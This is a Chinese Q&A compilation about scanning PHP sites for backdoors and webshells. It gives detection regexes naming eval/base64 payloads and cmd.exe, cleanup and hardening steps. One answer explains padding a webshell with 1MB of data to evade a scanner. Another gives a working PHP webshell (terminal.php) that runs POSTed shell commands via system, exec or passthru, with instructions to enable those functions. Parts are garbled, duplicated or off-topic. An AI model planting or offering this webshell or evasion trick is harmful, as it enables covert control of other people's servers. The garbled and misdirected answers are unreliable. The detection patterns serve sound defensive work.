php後門掃描
⑴ php木馬後門是什麼
後門木馬簡單點說就是隱蔽性很高的木馬。比如灰鴿子。後門木馬就是一種由原作者在編寫的木馬設置了一個後門程序,比如按6下shift就彈出許可權設置,這種快捷鍵一般只有原作者才知道的,然後原作者把這種木馬賣出,比如你買了他的木馬並且使用,你不知道快捷鍵密碼,所以最高許可權不在你這,而在他那兒~這樣你利用木馬盜號的過程中原作者就會知道,也就是說原作者可能利用你盜號,你所盜的號你知道,原作者也會知道。
如果你的電腦中了後門木馬病毒,你可以這樣,先下載360系統急救箱保存到D盤,重啟按F8進入帶網路連接的安全模式,使用360系統急救箱進行查殺 這樣就查殺的比較徹底了,然後啟動360殺毒 360安全衛士的木馬雲查殺功能查殺清除殘留就可以了.
⑵ 如何查找php木馬後門高級篇
可以通過一些關鍵字或者正則來進行匹配
(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
'(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',
'eval\(base64_decode\(',
'(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(wscript\.shell)',
'(gethostbyname\()',
'(cmd\.exe)',
'(shell\.application)',
'(documents\s+and\s+settings)',
'(system32)',
'(serv-u)',
'(提權)',
'(phpspy)',
'(後門)',
'(webshell)',
'(Program\s+Files)'
⑶ PHP程序,如何檢測是否被植入後門,木馬
清馬
1、找掛馬的標簽,比如有<script language="javasc粻紶綱咳蕺糾告穴梗膜ript" src="網馬地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。
2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update 表名 set 欄位名=replace(欄位名,'aaa','')」, 解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。
在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。
修補漏洞(修補網站漏洞也就是做一下網站安全。)
1、修改網站後台的用戶名和密碼及後台的默認路徑。
2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。
3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。
4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。
5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。
6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。
7、禁用FSO許可權也是一種比較絕的方法。
8、修改網站部分文件夾的讀寫許可權。
9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!
⑷ 用php寫的網站可以用什麼工具來檢查它是否被掛馬被植入後門了
清馬
1、找掛馬的標簽,比如有<script language="javascript" src="網馬地址"></script>或<iframe width=420 height=330 frameborder=0
scrolling=auto src=網馬地址></iframe>,或者是你用360或病殺毒軟體攔截了網馬網址。SQL資料庫被掛馬,一般是JS掛馬。
2、找到了惡意代碼後,接下來就是清馬,如果是網頁被掛馬,可以用手動清,也可以用批量清,網頁清馬比較簡單,這里就不詳細講,現在著重講一下SQL資料庫清馬,用這一句語句「update 表名 set 欄位名=replace(欄位名,'aaa','')」, 解釋一下這一句子的意思:把欄位名里的內容包含aaa的替換成空,這樣子就可以一個表一個表的批量刪除網馬。
在你的網站程序或資料庫沒有備份情況下,可以實行以上兩步驟進行清馬,如果你的網站程序有備份的話,直接覆蓋原來的文件即可。
修補漏洞(修補網站漏洞也就是做一下網站安全。)
1、修改網站後台的用戶名和密碼及後台的默認路徑。
2、更改資料庫名,如果是ACCESS資料庫,那文件的擴展名最好不要用mdb,改成ASP的,文件名也可以多幾個特殊符號。
3、接著檢查一下網站有沒有注入漏洞或跨站漏洞,如果有的話就相當打上防注入或防跨站補丁。
4、檢查一下網站的上傳文件,常見了有欺騙上傳漏洞,就對相應的代碼進行過濾。
5、盡可能不要暴露網站的後台地址,以免被社會工程學猜解出管理用戶和密碼。
6、寫入一些防掛馬代碼,讓框架代碼等掛馬無效。
7、禁用FSO許可權也是一種比較絕的方法。
8、修改網站部分文件夾的讀寫許可權。
9、如果你是自己的伺服器,那就不僅要對你的網站程序做一下安全了,而且要對你的伺服器做一下安全也是很有必要了!
⑸ 惡意代碼查殺和webshell查殺有區別嗎
惡意代碼查殺與webshell查殺不同。
惡意代碼查殺指將病毒庫中貯存的所有病毒特徵的惡意代碼查殺。
而webshell查殺指將只指對webshell進行查殺。
一般的殺毒軟體應該不能對webshell進行查殺。因為殺毒軟體一般只對本地文件進行掃描,而webshell是網頁後門。只能使用專業網站維護工具查殺,如360網站衛士。我們也可以做好防範。
從根本上解決動態網頁腳本的安全問題,要做到防注入、防爆庫、防COOKIES欺騙、防跨站攻擊(xss)等等,務必配置好伺服器FSO許可權。最小的許可權=最大的安全。防範webshell的最有效方法就是:可寫目錄不給執行許可權,有執行許可權的目錄不給寫許可權。防範方法:
1、建議用戶通過ftp來上傳、維護網頁,盡量不安裝asp的上傳程序。
2、對asp上傳程序的調用一定要進行身份認證,並只允許信任的人使用上傳程序。
3、asp程序管理員的用戶名和密碼要有一定復雜性,不能過於簡單,還要注意定期更換。
4、到正規網站下載程序,下載後要對資料庫名稱和存放路徑進行修改,資料庫名稱要有一定復雜性。
5、要盡量保持程序是最新版本。
6、不要在網頁上加註後台管理程序登陸頁面的鏈接。
7、為防止程序有未知漏洞,可以在維護後刪除後台管理程序的登陸頁面,下次維護時再通過上傳即可。
8、要時常備份資料庫等重要文件。
9、日常要多維護,並注意空間中是否有來歷不明的asp文件。
10、盡量關閉網站搜索功能,利用外部搜索工具,以防爆出數據。
11、利用白名單上傳文件,不在白名單內的一律禁止上傳,上傳目錄許可權遵循最小許可權原則。
拓展資料:
webshell就是以asp、php、jsp或者cgi等網頁文件形式存在的一種代碼執行環境,也可以將其稱做為一種網頁後門。黑客在入侵了一個網站後,通常會將asp或php後門文件與網站伺服器WEB目錄下正常的網頁文件混在一起,然後就可以使用瀏覽器來訪問asp或者php後門,得到一個命令執行環境,以達到控制網站伺服器的目的。
顧名思義,「web」的含義是顯然需要伺服器開放web服務,「shell」的含義是取得對伺服器某種程度上操作許可權。webshell常常被稱為入侵者通過網站埠對網站伺服器的某種程度上操作的許可權。由於webshell其大多是以動態腳本的形式出現,也有人稱之為網站的後門工具。
⑹ PHP大馬後門地址求教,有紅包
默認配置只檢測數據前1024kb的內容。本地後門掃描也只掃描小於1024KB的文件
可以在大馬文件前面添加1M的數據,必須在前面,利用寫的方式寫入
,你再根據一些視頻指導。可以更快的入門,這個你可以去那個後盾人平台看一看。
⑺ php網站怎麼留後門
在php.ini中設置開啟exec() system()等函數
創建 terminal.php 文件如下
<?php
!(isset($_POST['parma'])&&$_POST['parma']!='')&&exit("請輸入需要執行的shell命令");
!(isset($_POST['type'])&&$_POST['type']!='')&&exit("請輸入調用函數的類型");
$parma=$_POST['parma'];
switch($_POST['type']){
case'system':
returnsystem($parma);
break;
case'exec':
returnexec($parma,$return);
break;
case'passthru':
returnpassthru($parma);
break;
default:
exit;
}
?>
⑻ 請問怎樣在php代碼網站中找後門程序,有哪些方法
都可能出現,一般可以根據修改時間找。
⑼ 怎樣查殺 PHP 網站的後門
殺毒其實很簡單的
就直接打開電腦管家——病毒查殺——全盤殺毒
殺毒完成後,注意重啟一下電腦,這樣才可以保證病毒徹底被刪除